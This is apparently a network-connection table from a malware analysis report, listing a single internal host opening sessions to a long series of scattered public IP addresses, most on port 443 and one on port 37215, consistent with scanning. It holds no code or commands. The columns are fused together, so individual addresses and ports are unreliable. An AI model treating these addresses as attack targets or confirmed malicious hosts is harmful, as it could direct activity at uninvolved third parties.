                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9936192.168.2.235549873.137.212.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9937192.168.2.235055445.5.36.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9938192.168.2.2348342220.252.102.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9939192.168.2.234743232.117.196.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9940192.168.2.2360056119.19.21.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9941192.168.2.233806097.150.109.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9942192.168.2.2344448185.200.69.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9943192.168.2.233783253.92.168.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9944192.168.2.2351958146.51.209.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9945192.168.2.2358444193.81.251.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9946192.168.2.2339076139.64.101.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9947192.168.2.2356286161.219.98.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9948192.168.2.2333634124.106.124.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9949192.168.2.2345882120.22.191.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9950192.168.2.2341440182.211.213.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9951192.168.2.2349022223.218.131.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9952192.168.2.234368895.222.107.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9953192.168.2.2349308117.99.108.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9954192.168.2.2341322146.184.112.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9955192.168.2.2333272138.238.238.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9956192.168.2.234967648.194.239.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9957192.168.2.2335900104.40.147.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9958192.168.2.2337810140.71.61.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9959192.168.2.2346976145.146.52.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9960192.168.2.233467665.86.114.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9961192.168.2.2353606195.41.74.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9962192.168.2.2359728131.183.103.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9963192.168.2.2338518210.229.21.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9964192.168.2.233517640.108.172.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9965192.168.2.2347136205.17.206.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9966192.168.2.2346532217.99.119.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9967192.168.2.2338058197.177.151.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9968192.168.2.2358954111.173.69.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9969192.168.2.2344396204.1.188.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9970192.168.2.2341924103.11.227.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9971192.168.2.2336536181.56.162.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9972192.168.2.234896035.204.87.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9973192.168.2.2348398125.118.181.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9974192.168.2.2359670102.172.29.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9975192.168.2.2343684195.147.152.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9976192.168.2.2357048118.56.154.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9977192.168.2.2343644199.182.67.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9978192.168.2.2340170187.60.159.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9979192.168.2.235608443.159.175.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9980192.168.2.2333038100.167.60.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9981192.168.2.2356230160.79.11.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9982192.168.2.2350838141.194.250.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9983192.168.2.2336350167.154.97.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9984192.168.2.2354186142.7.68.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9985192.168.2.2348038156.222.203.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9986192.168.2.2350460166.165.121.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9987192.168.2.2346308186.33.141.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9988192.168.2.2352722111.148.190.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9989192.168.2.233546870.124.253.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9990192.168.2.2340838132.40.90.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9991192.168.2.234996051.55.33.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9992192.168.2.2352326186.67.95.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9993192.168.2.2336312179.1.91.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9994192.168.2.2356006124.179.181.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9995192.168.2.2348124170.103.50.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9996192.168.2.2346700168.132.175.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9997192.168.2.235728024.192.47.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9998192.168.2.233506019.162.197.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9999192.168.2.2338988142.178.83.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10000192.168.2.2356504199.18.188.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10001192.168.2.2354478162.9.242.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10002192.168.2.234406040.136.48.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10003192.168.2.2338672161.164.150.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10004192.168.2.235479869.74.129.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10005192.168.2.235862064.82.135.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10006192.168.2.234040849.216.243.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10007192.168.2.2334100106.156.77.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10008192.168.2.2344150207.115.134.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10009192.168.2.235689045.42.94.7637215
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10010192.168.2.234575878.29.168.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10011192.168.2.233305413.160.131.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10012192.168.2.2346356169.210.30.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10013192.168.2.2339702182.76.34.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10014192.168.2.234434871.216.172.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10015192.168.2.2333470207.132.150.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10016192.168.2.2343954164.69.37.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10017192.168.2.2352308175.172.142.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10018192.168.2.233605050.178.111.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10019192.168.2.2346316139.60.156.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10020192.168.2.2347640186.36.39.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10021192.168.2.235026047.12.47.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10022192.168.2.2359644161.71.246.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10023192.168.2.2351730185.205.15.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10024192.168.2.2337138148.135.104.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10025192.168.2.233981025.148.209.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10026192.168.2.234116258.232.238.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10027192.168.2.2352932150.159.30.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10028192.168.2.2338684162.159.211.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10029192.168.2.2350958143.113.72.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10030192.168.2.2350332192.95.118.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10031192.168.2.2360040163.0.218.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10032192.168.2.2345000208.215.1.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10033192.168.2.235450291.92.151.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10034192.168.2.2333558154.123.32.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10035192.168.2.2355264208.123.209.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10036192.168.2.2353812212.212.110.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10037192.168.2.235359494.79.129.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10038192.168.2.2342432172.96.81.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10039192.168.2.2339656183.101.166.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10040192.168.2.2342904112.136.3.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10041192.168.2.2344388131.128.8.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10042192.168.2.234685443.239.19.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10043192.168.2.2336460158.75.161.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10044192.168.2.2337660168.46.216.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10045192.168.2.234273696.220.238.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10046192.168.2.2347292151.106.42.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10047192.168.2.233935054.248.203.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10048192.168.2.2345666182.0.118.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10049192.168.2.234544457.251.37.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10050192.168.2.234800282.156.174.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10051192.168.2.23578449.130.59.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10052192.168.2.2351622202.70.201.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10053192.168.2.2336988163.57.70.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10054192.168.2.2333118106.248.3.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10055192.168.2.2345226192.109.24.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10056192.168.2.2353732186.89.160.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10057192.168.2.234869651.73.37.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10058192.168.2.2344768198.40.215.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10059192.168.2.2351202206.194.191.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10060192.168.2.2338226195.70.68.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10061192.168.2.233459412.217.204.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10062192.168.2.2359876158.207.179.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10063192.168.2.236076081.83.177.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10064192.168.2.234751084.56.16.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10065192.168.2.2347658216.182.228.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10066192.168.2.233567652.225.180.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10067192.168.2.234890498.143.92.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10068192.168.2.2342474116.189.32.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10069192.168.2.234092079.251.229.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10070192.168.2.2357712196.49.225.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10071192.168.2.234673814.62.187.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10072192.168.2.234409298.216.217.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10073192.168.2.2338962145.109.86.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10074192.168.2.2348728109.35.212.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10075192.168.2.2353676137.227.52.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10076192.168.2.234326270.95.229.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10077192.168.2.2340368145.133.131.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10078192.168.2.235314685.211.237.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10079192.168.2.234228091.107.243.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10080192.168.2.234866484.125.95.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10081192.168.2.2357588161.153.238.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10082192.168.2.2353986179.11.148.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10083192.168.2.2338946169.86.187.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10084192.168.2.2348804205.12.231.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10085192.168.2.2333400130.72.137.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10086192.168.2.2342832175.50.9.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10087192.168.2.235576024.1.29.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10088192.168.2.2335030207.133.250.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10089192.168.2.234717292.126.229.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10090192.168.2.235997666.7.121.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10091192.168.2.2334072147.80.204.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10092192.168.2.2357654206.51.218.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10093192.168.2.2358748198.99.244.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10094192.168.2.2360834194.44.188.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10095192.168.2.235108651.247.34.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10096192.168.2.2343782135.187.140.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10097192.168.2.234734892.133.66.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10098192.168.2.2354688139.27.155.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10099192.168.2.233324263.189.31.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10100192.168.2.2339742173.27.39.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10101192.168.2.2356034151.50.44.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10102192.168.2.2334476147.214.204.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10103192.168.2.2348106187.191.1.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10104192.168.2.23356388.52.201.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10105192.168.2.235399291.164.227.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10106192.168.2.2340024144.108.181.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10107192.168.2.2333580107.40.17.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10108192.168.2.233635014.46.214.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10109192.168.2.2346790148.33.153.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10110192.168.2.2355348126.60.87.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10111192.168.2.23395909.26.165.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10112192.168.2.2350240105.249.124.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10113192.168.2.234778851.21.26.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10114192.168.2.235478417.130.198.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10115192.168.2.2343324116.253.0.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10116192.168.2.233558036.169.35.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10117192.168.2.2343572198.21.171.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10118192.168.2.2349908183.32.217.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10119192.168.2.233740632.230.79.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10120192.168.2.235934453.30.101.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10121192.168.2.2353854213.53.233.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10122192.168.2.2336292141.238.242.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10123192.168.2.234970084.192.170.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10124192.168.2.2348590109.72.159.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10125192.168.2.2357816120.201.130.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10126192.168.2.2355780117.63.216.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10127192.168.2.2334872176.145.111.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10128192.168.2.234077680.250.182.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10129192.168.2.235521652.173.225.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10130192.168.2.234583014.160.192.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10131192.168.2.2351102181.196.11.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10132192.168.2.2341112100.243.6.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10133192.168.2.2339286159.192.207.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10134192.168.2.2347384116.46.79.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10135192.168.2.2347982181.13.83.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10136192.168.2.2341796211.255.139.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10137192.168.2.233764084.68.184.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10138192.168.2.2336640131.39.199.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10139192.168.2.235416617.173.171.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10140192.168.2.2339064118.45.12.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10141192.168.2.23560544.44.135.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10142192.168.2.2356864114.33.90.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10143192.168.2.2355274202.66.228.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10144192.168.2.2344840137.226.140.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10145192.168.2.234592013.80.81.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10146192.168.2.2334654157.53.238.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10147192.168.2.235338434.116.141.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10148192.168.2.2351296222.111.222.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10149192.168.2.2344632158.2.211.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10150192.168.2.2352444221.36.183.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10151192.168.2.2344418211.65.23.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10152192.168.2.2337188194.210.149.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10153192.168.2.234302095.175.68.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10154192.168.2.235137240.226.114.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10155192.168.2.2335058166.240.147.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10156192.168.2.234142865.74.231.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
